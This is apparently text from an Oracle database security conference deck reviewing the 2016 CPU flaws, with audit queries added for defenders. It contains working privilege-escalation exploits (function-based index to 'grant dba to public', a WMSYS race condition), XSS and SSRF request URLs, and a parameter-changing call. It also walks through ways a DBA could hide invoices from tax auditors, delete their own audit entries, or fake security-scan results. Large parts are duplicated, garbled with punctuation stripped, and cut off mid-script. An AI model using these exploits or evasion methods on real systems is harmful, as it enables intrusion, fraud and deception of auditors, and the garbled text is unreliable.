Problem: In Oracle 12c the DBMS_PDB_EXEC_SQL procedure is a wrapper for the DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user. The XDB user has the execute privilege on DBMS_PDB_EXEC_SQL, and as such, by first exploiting a vulnerability in a publicly executable XDB-owned PL/SQL object, an attacker can leverage this privilege to execute SQL as SYS. The fix changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from using the DEFINER rights to the INVOKER rights execution model.
Reporter: David Litchfield
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust
sqlplus sysman_apm/rds@ora1
SQL> desc dba_users
ERROR:
ORA-04043: object "SYS"."DBA_USERS" does not exist

==> user does not have the privilege to access DBA_USERS
SQL> select * from user_sys_privs;
USERNAME    PRIVILEGE              ADM
----------  ---------------------  ---
SYSMAN_APM  UNLIMITED TABLESPACE   NO
SYSMAN_APM  CREATE VIEW            NO
SYSMAN_APM  CREATE ANY LIBRARY     NO
SYSMAN_APM  CREATE SEQUENCE        NO
SYSMAN_APM  CREATE TABLE           NO
SYSMAN_APM  CREATE LIBRARY         NO
SYSMAN_APM  CREATE ANY INDEX       NO

==> CREATE ANY LIBRARY privilege is granted to SYSMAN_APM
SQL> select * from user_role_privs;
USERNAME    GRANTED_ROLE  ADM  DEF  OS_
----------  ------------  ---  ---  ---
SYSMAN_APM  CONNECT       NO   YES  NO
SYSMAN_APM  RESOURCE      NO   YES  NO

==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
  BEGIN
    execute immediate 'grant dba to public';
    COMMIT;
    RETURN FOO;
  END;
  /
==> Grant execution privileges to PUBLIC
SQL> grant execute on getdba to public;

==> Create an index on SYSTEM.HELP using a function-based index (FBI). The function getdba is used for the function-based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));

==> Reconnect is necessary
SQL> select * from dba_role_privs where granted_role = 'DBA' and grantee = 'PUBLIC';
GRANTEE  GRANTED_ROLE  ADM  DEF
-------  ------------  ---  ---
PUBLIC   DBA           NO   YES
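As an added defender-side example (not from the slides), the dictionary queries below inventory the preconditions that the CVE-2016-3489 and CVE-2016-5604 demonstrations rely on: an INDEX object privilege held by a non-owner, the CREATE ANY INDEX / CREATE ANY PROCEDURE / INHERIT ANY PRIVILEGES system privileges, INHERIT PRIVILEGES grants on SYS and SYSTEM, and function-based indexes on SYS or SYSTEM tables. The view, column and privilege names are Oracle's; the expectation that each query returns no rows on a hardened system is an assumption about the target, not a statement from the slides.

```sql
-- Added example (not part of the slides): audit queries for the preconditions used
-- in the CVE-2016-3489 and CVE-2016-5604 demonstrations. Run as SYS or a DBA on
-- 11.2.0.4 / 12.1.0.2. On a hardened system each query should come back with
-- "no rows selected" (assumption: no third-party schema legitimately needs these).

-- 1. INDEX object privilege on a table owned by someone else: the slide's query
--    generalised to all owners. An index built by the grantee evaluates the
--    grantee's invoker's-rights function while the table owner is the invoker.
SELECT grantee, owner, table_name, grantable
  FROM dba_tab_privs
 WHERE privilege = 'INDEX'
   AND grantee <> owner
 ORDER BY owner, table_name, grantee;

-- 2. System privileges that give the same effect without an INDEX grant
--    (SYSMAN_APM held CREATE ANY INDEX; on 12.1.0.2 SYSTEM used CREATE ANY
--    PROCEDURE to plant the function in WMSYS, which holds CREATE ANY INDEX).
SELECT grantee, privilege, admin_option
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE ANY INDEX', 'CREATE ANY PROCEDURE',
                     'ALTER ANY PROCEDURE', 'INHERIT ANY PRIVILEGES')
   AND grantee NOT IN ('SYS', 'SYSTEM', 'DBA')
 ORDER BY privilege, grantee;

-- 3. 12c only: who may still inherit SYS's or SYSTEM's privileges when their
--    invoker's-rights code runs under that user. The ORA-06598 on the 12.1.0.2
--    slide is what a missing grant looks like. INHERIT PRIVILEGES appears in
--    DBA_TAB_PRIVS with the user whose privileges can be inherited as OWNER.
SELECT grantee, owner AS inherit_from, grantor
  FROM dba_tab_privs
 WHERE privilege = 'INHERIT PRIVILEGES'
   AND owner IN ('SYS', 'SYSTEM')
   AND grantee <> owner;

-- 4. Function-based indexes on SYS or SYSTEM tables: the slides' EXPLOIT_INDEX
--    would show up here on SYS.INCVID or SYSTEM.HELP with an expression calling
--    SYSTEM.GETDBA, WMSYS.GETDBA or SYSMAN_APM.GETDBA. COLUMN_EXPRESSION is a
--    LONG, so it cannot be filtered in the WHERE clause and is listed for review.
SELECT i.table_owner, i.table_name, i.owner AS index_owner, i.index_name,
       i.index_type, e.column_expression
  FROM dba_indexes i
  JOIN dba_ind_expressions e
    ON e.index_owner = i.owner AND e.index_name = i.index_name
 WHERE i.table_owner IN ('SYS', 'SYSTEM')
   AND i.index_type LIKE 'FUNCTION-BASED%'
 ORDER BY i.table_owner, i.table_name, i.index_name;
```

Query 4 also flags the case the slides show where the index owner (SYSTEM, WMSYS, SYSMAN_APM) differs from the table owner, which is worth checking on its own.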
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
A top manager comes to the office of the DBA and asks you: "Tomorrow the auditor from the tax authority will come to check our invoices. Could you hide the 10,000 EUR invoice from the last party at the night club, just from the auditor? I will increase your salary…"
Scenario 2
Remove your own audit entries from the audit log which is retrieved by the SIEM solution (e.g. Splunk, QRadar, …) via JDBC.
Scenario 3
You don't have time to harden all your databases, but the security department wants to see results. Instead of fixing the problem you will just deliver the proper results.
A lot of different wishes…
but luckily we are using Oracle.
Problem & Solution
Oracle offers different features to fulfill these wishes without affecting other users…
All these scenarios have in common that we have to manipulate the SQL statement:
Select value …
Oracle Data Redaction allows masking or manipulating the selected data just for a single database user.
Possible usage: replace true/false, replace USER/ADMIN…; the DBA can decide what will be returned.
Select value …
A typical query from security checklists/scanners looks like this:
select upper(value) from parameter where upper(name) = 'XYZ'
The tool expects the value TRUE but it contains FALSE.
Oracle Data Redaction allows you to change the result value from FALSE to TRUE
==> the audit department is happy because the database passes all the security checks…
… from table/view …
Modifying objects can be used as a man in the middle as well.
Possible approaches:
modify views (e.g. add spare != 'DBA1' to the view dba_audit_trail): all entries of the OS user DBA1 will be removed from the view. If a SIEM solution retrieves the audit data, the entries from DBA1 are not retrieved.
create or change synonyms to "redirect" objects
replace a table with a view/instead-of trigger
---------- dbms_macadm ----------
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;
SQL> create or replace view mydual as select 'X' as dummy from dual where user != 'DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;
SYS can influence the DVSYS analysis via a view named DUAL
Red Attack - Die Katastrophe in der Datenbank ("The catastrophe in the database", Gunther Pipperr)
… where x=y
WHERE conditions can be changed using VPD
VPD: add the where clause invoice_name != 'SAUNA_CLUB CHANTAL'
Hide "certain" invoices from the audit department
Select value from table/view where x=y
The SQL Translation Framework (12c only) allows replacing an entire query: the user submits query A, and the SQL Translation Framework replaces query A with query B.
Possible Countermeasures for paranoid Auditors
Add a random string, e.g. aksdjhiuz, to avoid the SQL Translation Framework (new SQL_ID)
Try to get EXEMPT ACCESS POLICY to disable VPD (even if not used in the application)
Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
Always check the object type (is it really a table?)
Use checksums for certain database objects (especially views)
Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
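The countermeasures above, turned into a dictionary check script, as an added example that is not part of the slides: it looks for the redirected DUAL, Data Redaction and VPD policies, SQL Translation Framework profiles, the privileges needed to set them up, and fingerprints the views a SIEM reads. The view and column names are Oracle's (12c); the list of views and tables in the last two queries is a constructed placeholder to be replaced with the objects an auditor's scripts actually read.

```sql
-- Added example (not from the slides): checks an auditor can run before trusting
-- query results. Run as SYS or a DBA on Oracle 12c. The object lists in queries
-- 6 and 7 are constructed placeholders (assumption), everything else is Oracle's.

-- 0. Who am I really, and which schema resolves my unqualified names?
--    (slide: check the current schema; use SYS.DUAL, not DUAL)
SELECT SYS_CONTEXT('USERENV', 'SESSION_USER')   AS session_user,
       SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA') AS current_schema
  FROM SYS.DUAL;

-- 1. Does the public synonym DUAL still point at SYS.DUAL, and is every object
--    named DUAL really SYS's table? (slide: SYS influences DVSYS via a DUAL view)
SELECT owner, synonym_name, table_owner, table_name
  FROM dba_synonyms
 WHERE synonym_name = 'DUAL'
   AND NOT (table_owner = 'SYS' AND table_name = 'DUAL');

SELECT owner, object_name, object_type
  FROM dba_objects
 WHERE object_name = 'DUAL'
   AND NOT (owner = 'SYS' AND object_type = 'TABLE');

-- 2. Data Redaction: which columns are rewritten, and for whom (EXPRESSION is
--    the policy condition, typically a test on the session user)
SELECT p.object_owner, p.object_name, p.policy_name, p.expression, p."ENABLE",
       c.column_name, c.function_type
  FROM redaction_policies p
  JOIN redaction_columns  c
    ON c.object_owner = p.object_owner AND c.object_name = p.object_name;

-- 3. VPD: policy functions that append WHERE clauses to somebody's SELECT
SELECT object_owner, object_name, policy_name, pf_owner, "PACKAGE", "FUNCTION"
  FROM dba_policies
 WHERE "ENABLE" = 'YES';

-- 4. SQL Translation Framework (12c): profiles, registered rewrites, and whether
--    the instance has a profile switched on
SELECT owner, profile_name, translate_new_sql
  FROM dba_sql_translation_profiles;

SELECT owner, profile_name, sql_text, translated_text, enabled
  FROM dba_sql_translations;

SELECT name, value
  FROM v$parameter
 WHERE name = 'sql_translation_profile';

-- 5. Who could set any of this up, or is exempt from it
SELECT grantee, privilege
  FROM dba_sys_privs
 WHERE privilege IN ('EXEMPT ACCESS POLICY', 'EXEMPT REDACTION POLICY',
                     'CREATE PUBLIC SYNONYM', 'DROP PUBLIC SYNONYM',
                     'CREATE ANY SYNONYM', 'CREATE ANY VIEW', 'CREATE ANY TRIGGER',
                     'CREATE ANY PROCEDURE', 'ALTER ANY PROCEDURE')
   AND grantee NOT IN ('SYS', 'SYSTEM', 'DBA')
 ORDER BY privilege, grantee;

-- 6. Checksums for the views the SIEM reads (slide: use checksums for views).
--    Record these on a trusted install and diff them at every audit.
SELECT owner, view_name,
       RAWTOHEX(STANDARD_HASH(text_vc, 'SHA256')) AS text_sha256
  FROM dba_views
 WHERE owner = 'SYS'
   AND view_name IN ('DBA_AUDIT_TRAIL', 'DBA_USERS', 'DBA_ROLE_PRIVS',
                     'DBA_SYS_PRIVS', 'DBA_TAB_PRIVS');

-- 7. Are the "tables" an audit script reads really tables?
--    (slide: always check the object type)
SELECT owner, object_name, object_type
  FROM dba_objects
 WHERE owner = 'SYS'
   AND object_name IN ('AUD$', 'FGA_LOG$', 'USER$')
   AND object_type <> 'TABLE';
```

TEXT_VC holds the first 4000 characters of the view text, so for very long views compare the full TEXT column with a client-side hash instead.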
Modifying Queries on the fly
Powerful features for applications
(Huge) potential on critical systems to modify application logic (e.g. DB Vault)
DBAs and auditors/security departments should be aware of powerful Oracle features which could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 12.2 required (new features, new packages, …)
Migration to 12.2
More auditing projects
Integration of Auditing with SIEM solutions
Q & A
Thank you / Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
A top manager comes to the DBA's office and asks you: "Tomorrow the auditor from the tax authority will come to check our invoices. Could you hide the 10,000 EUR invoice from the last party at the night club, just from the auditor? I will increase your salary…"
Scenario 2
Remove your own audit entries from the audit log, which is retrieved by the SIEM solution (e.g. Splunk, QRadar, …) via JDBC.
Scenario 3
You don't have time to harden all your databases, but the security department wants to see results. Instead of fixing the problem, you just deliver the proper results.
A lot of different wishes… but luckily we are using Oracle.
Problem & Solution
Oracle offers different features to fulfill these wishes without affecting other users…
All these scenarios have in common that we have to manipulate a SQL statement.
Select value …
Oracle Data Redaction allows masking or manipulating the selected data just for a single database user.
Possible usage: replace true/false, replace USER/ADMIN, … The DBA can decide what will be returned.
Select value …
A typical query from security checklists/scanners looks like this:
select upper(value) from parameter where upper(name) = 'XYZ'
The tool expects the value TRUE, but it contains FALSE. Oracle Data Redaction allows you to change the result value from FALSE to TRUE ==> the audit department is happy because the database passes all the security checks…
… from table/view …
Modifying objects can be used as a man in the middle as well.
Possible approaches:
modify views (e.g. add spare != 'DBA1' to the view dba_audit_trail): all entries of the OSUSER DBA1 will be removed in the view. If a SIEM solution retrieves the audit data, the entries from DBA1 are not retrieved.
create or change synonyms to "redirect" objects
replace a table with a view / an instead-of trigger
----- dbms_macadm -----
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;
SQL> create or replace view mydual as select 'X' as dummy from dual where user='DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
… where x=y
Where conditions can be changed using VPD.
VPD: add the where clause invoice_name != 'SAUNA_CLUB CHANTAL'
Hide "certain" invoices from the audit department.
Select value from table/view where x=y
The SQL Translation Framework (12c only) allows replacing an entire query: the user submits Query A, and the SQL Translation Framework replaces Query A with Query B.
Possible Countermeasures for paranoid Auditors
Add a random string (e.g. aksdjhiuz) to the query to avoid the SQL Translation Framework (new SQL_ID)
Try to get EXEMPT ACCESS POLICY to disable VPD (even if not used in the application)
Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
Always check the object type (is it really a table?)
Use checksums for certain database objects (especially views)
Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
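As an added example (not part of the original deck), the following SQL*Plus script turns the countermeasures above into dictionary checks: it verifies what the public synonym DUAL resolves to, lists VPD and Data Redaction policies and who is exempt from them, lists SQL Translation Framework profiles and rewrites, shows the session's current schema, and keeps SHA-256 checksums of the DDL of selected SYS views so that a later modification is detected. It assumes a DBA session with EXECUTE on DBMS_CRYPTO on Oracle 12.1 (REDACTION_*, DBA_SQL_TRANSLATION* and DBMS_CRYPTO.HASH_SH256 are 12c); the table VIEW_BASELINE and the list of views are constructed for the example.

```sql
-- Added audit script, not part of the original deck. Assumes a DBA session
-- on Oracle 12.1; VIEW_BASELINE and the list of checked views are constructed.
SET SERVEROUTPUT ON

-- 1. Does the public synonym DUAL still resolve to the real SYS.DUAL table?
--    Expected: SYS DUAL TABLE. Anything else (e.g. SYS MYDUAL VIEW) is a redirect.
SELECT s.table_owner, s.table_name, o.object_type
FROM   dba_synonyms s
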